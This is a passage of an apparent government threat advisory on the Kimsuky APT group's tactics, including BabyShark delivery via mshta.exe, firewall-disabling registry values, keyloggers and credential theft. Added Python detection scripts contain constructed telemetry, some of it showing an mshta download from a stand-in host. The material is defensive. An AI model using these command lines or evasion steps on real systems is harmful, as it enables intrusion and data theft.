<li>The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]</li>
<li>Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
<ul style=”list-style-type: circle;”>
<li>Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.</li>
<li>After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.</li>
</ul>
</li>
<li>Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>15</a>],[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>16</a>],[<a href=”https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/”>17</a>]</li>
</ul>

<p>Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (<em>Phishing: Spearphishing Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Drive-by Compromise</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1189/”>T1189</a>], <em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>18</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Execution</h4>

<p>After obtaining initial access, Kimsuky uses <a href=”https://attack.mitre.org/software/S0414/”>BabyShark</a> malware and PowerShell or the Windows Command Shell for <em>Execution</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0002/”>TA0002</a>].</p>

<ul>
<li>BabyShark is Visual Basic Script (VBS)-based malware.
<ul>
<li>First, the compromised host system uses the native Microsoft Windows utility, <code>mshta.exe</code>, to download and execute an HTML application (HTA) file from a remote system (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005/”>T1218.005</a>]).</li>
<li>The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.</li>
<li>The script maintains <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] by creating a Registry key that runs on startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]).</li>
<li>It then collects system information (<em>System Information Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1082”>T1082</a>]), sends it to the operator’s command and control (C2) servers, and awaits further commands.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>19</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>20</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>21</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>22</a>]</li>
</ul>
</li>
<li>Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (<em>Phishing: Spearphishing Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Phishing: Spearphishing Attachment</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001″>T1566.001</a>]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>23</a>]</li>
<li>Kimsuky uses PowerShell to run executables from the internet in the target’s memory, without touching the physical hard disk on the computer (<em>Command and Scripting Interpreter: PowerShell</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/001/”>T1059.001</a>]). PowerShell commands/scripts can be executed without invoking <code>powershell.exe</code> through HTA files or <code>mshta.exe</code>.[<a href=”https://attack.mitre.org/groups/G0094/”>24</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>25</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>26</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>27</a>]</li>
</ul>
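<p>The execution chain described above (<code>mshta.exe</code> loading remote content, a script interpreter running under it, then a Run-key write) can be hunted in process-creation and registry telemetry. The following Python is an added example, not part of the CISA/FBI advisory; the Sysmon-style field names (<code>Image</code>, <code>ParentImage</code>, <code>CommandLine</code>, <code>TargetObject</code>), the host names and every event in it are constructed for illustration.</p>

```python
import ntpath
import re

# Remote content handed to mshta.exe: a URL or a UNC path (T1218.005).
URL = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
UNC = re.compile(r"\\\\[\w.$-]+\\\S+")
# Inline script passed on the command line instead of a file.
INLINE = re.compile(r"(?i)\b(?:javascript|vbscript):")
# Interpreters the advisory names (PowerShell, Windows Command Shell) plus the VBS hosts.
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = INTERPRETERS | {"mshta.exe"}
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")

# Finding tag -> ATT&CK technique referenced in the advisory text.
TECHNIQUE = {
    "mshta_remote": "T1218.005",
    "mshta_inline": "T1218.005",
    "interpreter_child": "T1059",
    "run_key": "T1547.001",
}


def basename(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()


def classify(event):
    """Return the finding tags for one event (empty list when nothing matches)."""
    findings = []
    image = basename(event.get("Image"))
    if event["EventID"] == 1:  # process creation
        cmd = event.get("CommandLine", "")
        if image == "mshta.exe":
            if URL.search(cmd) or UNC.search(cmd):
                findings.append("mshta_remote")
            if INLINE.search(cmd):
                findings.append("mshta_inline")
        if image in INTERPRETERS and basename(event.get("ParentImage")) == "mshta.exe":
            findings.append("interpreter_child")
    elif event["EventID"] == 13:  # registry value set
        if image in SCRIPT_HOSTS and RUN_KEY.search(event.get("TargetObject", "")):
            findings.append("run_key")
    return findings


def hosts_with_full_chain(events):
    """Hosts that show all three stages; event ordering is not checked."""
    seen = {}
    for event in events:
        seen.setdefault(event["Computer"], set()).update(classify(event))
    return sorted(
        host for host, tags in seen.items()
        if tags & {"mshta_remote", "mshta_inline"}
        and {"interpreter_child", "run_key"} <= tags
    )


# Constructed sample telemetry (not taken from the advisory).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://files.example.test/notice.hta"},
    {"EventID": 1, "Computer": "WS-01",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command <constructed>"},
    {"EventID": 13, "Computer": "WS-01",
     "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # Benign look-alikes: a local HTA installer and a vendor updater setting a Run key.
    {"EventID": 1, "Computer": "WS-02",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"EventID": 13, "Computer": "WS-02",
     "Image": r"C:\Program Files\Vendor\updater.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater"},
    # Inline script only: flagged, but the chain is incomplete on this host.
    {"EventID": 1, "Computer": "WS-03",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe vbscript:<constructed>"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for tag in classify(ev):
            print(ev["Computer"], TECHNIQUE[tag], tag)
    print("full chain:", hosts_with_full_chain(SAMPLE_EVENTS))
```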

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Persistence</h4>

<p>Kimsuky has demonstrated the ability to establish <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] through using malicious browser extensions, modifying system processes, manipulating the <code>autostart</code> execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.</p>

<ul>
<li>In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (<em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]). The extension’s reviews gave it a five-star rating; however, the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>28</a>]</li>
<li>Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (<em>Boot or Logon Autostart Execution </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1547″>T1547</a>]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[<a href=”https://attack.mitre.org/groups/G0094/”>29</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>30</a>]</li>
<li>During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (<em>Remote Services: Remote Desktop Protocol </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/001″>T1021.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>31</a>]</li>
<li>Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (<code>.hwp</code> files) in the Registry (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001″>T1546.001</a>]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>32</a>] Kimsuky also targets Microsoft Office users by formatting their documents in a <code>.docx</code> file rather than <code>.hwp</code> and will tailor their macros accordingly.[33]</li>
<li>Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Preprocessor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (<em>Server Software Component: Web Shell</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T505/003″>T1505.003</a>]). The actor often adds “Dinosaur” references within the modified web shell code.[34]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Privilege Escalation</h4>

<p>Kimsuky uses well-known methods for <em>Privilege Escalation </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in <code>explorer.exe</code>.</p>

<ul>
<li>Kimsuky has used Win7Elevate, an exploit from the Metasploit framework, to bypass User Account Control and inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]). This malicious code decrypts its spying library (a collection of keystroke logging, remote control access, and remote control download and execution tools) from resources, regardless of the victim’s operating system. It then saves the decrypted file to disk with a random but hardcoded name (e.g., <code>dfe8b437dd7c417a6d.tmp</code>) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>35</a>]</li>
<li>Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]).[<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>36</a>]</li>
</ul>


<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 1: Privileges set for the injection</em> [<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>37</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Defense Evasion</h4>

<p>Kimsuky uses well-known and widely available methods for <em>Defense Evasion</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0005/”>TA0005</a>] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>38</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>39</a>]</p>

<ul>
<li>Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (<em>Impair Defenses: Disable or Modify System Firewall</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>40</a>]</li>
</ul>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><code>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile</code><br/>
<code>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile</code><br/>
<code>HKLM\SOFTWARE\AhnLab\V3IS2007\InternetSec</code>: <code>FWRunMode 0</code><br/>
<code>HKLM\SOFTWARE\Ahnlab\V3IS80\is</code>: <code>fwmode 0</code></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 2: Disabled firewall values in the Registry</em> [<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>41</a>]</p>

<ul>
<li>Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (<em>Indicator Removal on Host: File Deletion </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/004/”>T1070.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>42</a>]</li>
<li>Kimsuky has used <code>mshta.exe</code>, a utility that executes Microsoft HTML Applications (HTAs). It can be used for proxy execution of malicious <code>.hta</code> files and JavaScript or VBS through a trusted Windows utility (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005″>T1218.005</a>]). It can also be used to bypass application allowlisting solutions (<em>Abuse Elevation Control Mechanism: Bypass User Access Control</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>43</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>44</a>]</li>
<li>Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevate is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (<em>Process Injection </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1055″>T1055</a>]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>45</a>],[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>46</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>47</a>]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Credential Access</h4>

<p>Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (<em>Credential Access</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0006/”>TA0006</a>]).</p>

<ul>
<li>Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses <code>ProcDump</code>, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (<em>OS Credential Dumping</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/”>T1003</a>]). <code>ProcDump</code> monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of <code>ProcDump</code> in the BabyShark malware.[<a href=”https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/”>48</a>]</li>
<li>According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (<em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>49</a>],[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>50</a>] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named <code>jQuery.js</code>, from a separate site (see figure 3).[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>51</a>]</li>
</ul>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”>[Image: screenshot of the <code>jQuery.js</code> source, which fetches a script from <code>bizsonet.com</code> and appends a <code>script</code> element to the page head]</p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 3: JavaScript file, named <code>jQuery.js</code></em> [<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>52</a>]</p>

<ul>
<li>Kimsuky also uses a PowerShell-based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>], <em>Network Sniffing</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040/”>T1040</a>]). MECHANICAL logs keystrokes to <code>%userprofile%\appdata\roaming\apach.{txt,log}</code> and is also a “cryptojacker,” which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>53</a>]</li>
<li>Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website the victim accessed and to collect any credentials the victim entered.[54]</li>
</ul>
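<p>The <code>mshta.exe</code> bullet under defense evasion and the <code>ProcDump</code> bullet in this section both describe legitimate utilities, so process-creation telemetry is where a defender sees them. The triage below is an added example, not part of the advisory: the field names follow Sysmon Event ID 1, and the sample events, host names, <code>OriginalFileName</code> values and priority rules are assumptions of this example.</p>

```python
import ntpath
import re

# Heuristic (assumption): parents that run unattended scripts. cmd.exe is left
# out because administrators commonly start ProcDump from an interactive prompt.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
PROCDUMP_NAMES = {"procdump.exe", "procdump64.exe"}


def base(path):
    """Lower-cased file name of a Windows path ('' when the field is missing)."""
    return ntpath.basename(path or "").lower()


def identify(ev):
    """Return (tool, renamed). OriginalFileName comes from the PE version
    resource, so it still names the utility after the file is renamed.
    Assumption: the genuine binaries report 'MSHTA.EXE' and 'procdump'."""
    name = base(ev.get("Image"))
    orig = (ev.get("OriginalFileName") or "").lower()
    if name == "mshta.exe" or orig == "mshta.exe":
        return "mshta", name != "mshta.exe"
    if name in PROCDUMP_NAMES or orig == "procdump":
        return "procdump", name not in PROCDUMP_NAMES
    return None, False


def mshta_target(cmdline):
    """Classify what mshta.exe was asked to run (.hta file, JavaScript or VBS)."""
    if re.search(r"\b(?:javascript|vbscript):", cmdline, re.I):
        return "inline script"
    if re.search(r"\bhttps?://", cmdline, re.I):
        return "remote URL"
    if re.search(r"\.hta\b", cmdline, re.I):
        return "local .hta file"
    return "other"


def triage(events):
    """One finding per mshta/ProcDump launch: (host, tool, priority, reasons)."""
    findings = []
    for ev in events:
        tool, renamed = identify(ev)
        if tool is None:
            continue
        parent = base(ev.get("ParentImage"))
        reasons = []
        if renamed:
            reasons.append("renamed to " + base(ev.get("Image")))
        if tool == "mshta":
            target = mshta_target(ev.get("CommandLine", ""))
            reasons.append("target: " + target)
            high = renamed or target in ("inline script", "remote URL")
        else:
            high = renamed or parent in SCRIPT_HOSTS
        reasons.append("parent: " + parent)
        findings.append((ev["Computer"], tool, "high" if high else "review", reasons))
    return findings


# Constructed process-creation events for illustration only.
SAMPLE_EVENTS = [
    {"Computer": "WS-014",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe https://files.example.test/notice.hta"},
    {"Computer": "WS-014", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\j.doe\Downloads\form.hta"'},
    {"Computer": "WS-022", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\ProgramData\updater.exe", "OriginalFileName": "procdump",
     "CommandLine": "updater.exe -accepteula 4321"},
    {"Computer": "SRV-003", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Tools\procdump64.exe", "OriginalFileName": "procdump",
     "CommandLine": "procdump64.exe -accepteula 880"},
    {"Computer": "SRV-003", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for host, tool, priority, reasons in triage(SAMPLE_EVENTS):
        print(f"{priority:6} {host:8} {tool:9} {'; '.join(reasons)}")
```

<p>Findings marked "review" are expected wherever administrators use these tools; the parent process and the renamed-binary check are what separate them from the scripted use the advisory describes.</p>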

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Discovery</h4>

<p>Kimsuky enumerates system information and the file structure for victims’ computers and networks (<em>Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0007/”>TA0007</a>]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (<em>File and Directory Discovery </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]). The information is directed to <code>C:\WINDOWS\msdatl3.inc</code>, read by malware, and likely emailed to the malware’s command server.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>55</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Collection</h4>

<p>Kimsuky collects data from the victim system through its HWP document malware and its keylogger (<em>Collection</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0009/”>TA0009</a>]). The HWP document malware changes the default program association in the Registry to open HWP documents (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001/”>T1546.001</a>]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to <code>C:\Program Files\Common Files\System\Ole DB\msolui80.inc</code> and records the active window name where the user pressed keys (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>]). There is another keylogger variant that logs keystrokes into <code>C:\WINDOWS\setup.log</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>56</a>]</p>
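<p>The keylogger and enumeration output files named in this advisory (the MECHANICAL log under the user profile, <code>msdatl3.inc</code>, <code>msolui80.inc</code> and <code>setup.log</code>) can be hunted in file-creation telemetry. The matcher below is an added example, not part of the advisory: it expands the brace form and <code>%userprofile%</code>, and its profile locations, any-drive-letter matching, event field names (after Sysmon Event ID 11) and sample events are assumptions.</p>

```python
import re

# File paths named in the advisory, written with Windows path separators.
ADVISORY_PATHS = [
    (r"%userprofile%\appdata\roaming\apach.{txt,log}", "MECHANICAL keylogger log"),
    (r"C:\WINDOWS\msdatl3.inc", "file and system enumeration output"),
    (r"C:\Program Files\Common Files\System\Ole DB\msolui80.inc", "keylogger output"),
    (r"C:\WINDOWS\setup.log", "keylogger variant output"),
]

# Assumption: profiles live under <drive>:\Users\<name> or, on older systems,
# <drive>:\Documents and Settings\<name>.
PROFILE_RE = r"[a-z]:\\(?:users|documents and settings)\\[^\\]+"


def expand_braces(text):
    """Expand shell-style {a,b} groups: 'apach.{txt,log}' gives two names."""
    m = re.search(r"\{([^{}]*)\}", text)
    if not m:
        return [text]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(text[:m.start()] + alt + text[m.end():]))
    return out


def normalise(path):
    """Put a logged Windows path into one comparable, lower-case form."""
    p = path.strip().strip('"').replace("/", "\\")
    if p.startswith("\\\\?\\"):        # drop the extended-length prefix \\?\
        p = p[4:]
    p = re.sub(r"\\{2,}", r"\\", p)     # collapse doubled separators
    return p.lower()


def compile_indicator(advisory_path):
    """Turn one advisory path into an anchored regex over normalised paths."""
    alts = []
    for variant in expand_braces(normalise(advisory_path)):
        if variant.startswith("%userprofile%"):
            head, tail = PROFILE_RE, variant[len("%userprofile%"):]
        elif re.match(r"[a-z]:", variant):
            # Assumption: Windows may be installed on a drive other than C:.
            head, tail = "[a-z]:", variant[2:]
        else:
            head, tail = "", variant
        alts.append(head + re.escape(tail))
    return re.compile("^(?:" + "|".join(alts) + ")$")


INDICATORS = [(compile_indicator(p), p, what) for p, what in ADVISORY_PATHS]


def scan(events):
    """Return (host, writing process, written path, advisory path, meaning) per hit."""
    hits = []
    for ev in events:
        target = normalise(ev["TargetFilename"])
        for rx, listed, what in INDICATORS:
            if rx.match(target):
                hits.append((ev["Computer"], ev["Image"], ev["TargetFilename"], listed, what))
    return hits


# Constructed file-creation events for illustration only.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "Image": PS,
     "TargetFilename": r"C:\Users\j.doe\AppData\Roaming\apach.log"},
    {"Computer": "WS-014", "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"c:\windows\MSDATL3.INC"},
    {"Computer": "WS-022", "Image": r"D:\Windows\explorer.exe",
     "TargetFilename": "D:/Program Files//Common Files/System/Ole DB/msolui80.inc"},
    {"Computer": "WS-022", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"\\?\C:\WINDOWS\setup.log"},
    # Near misses that must not match: wrong directory or extra suffix.
    {"Computer": "WS-030", "Image": PS,
     "TargetFilename": r"C:\Users\j.doe\AppData\Roaming\Apache\apach.log"},
    {"Computer": "WS-030", "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Windows\Temp\setup.log"},
    {"Computer": "WS-030", "Image": PS,
     "TargetFilename": r"C:\Users\j.doe\AppData\Roaming\apach.log.bak"},
]

if __name__ == "__main__":
    for host, image, path, listed, what in scan(SAMPLE_EVENTS):
        print(f"{host}: {path} written by {image} -> {what} ({listed})")
```

<p>A path match is a lead to triage together with the writing process and timestamp, not a verdict on its own.</p>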

<p>Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (<em>Command and Scripting Interpreter: Python</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/006/”>T1059.006</a>]). The Python program downloads various implants based on C2 options specified after the <code>filedown.php</code> (see figure 4).</p>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><span style=”page-break-after: avoid;”><font color=”#000000″><font face=”Times New Roman”><img alt=”” data-entity-type=”” data-entity-uuid=”” src=”https://us-cert.cisa.govdata:image/png;base64,
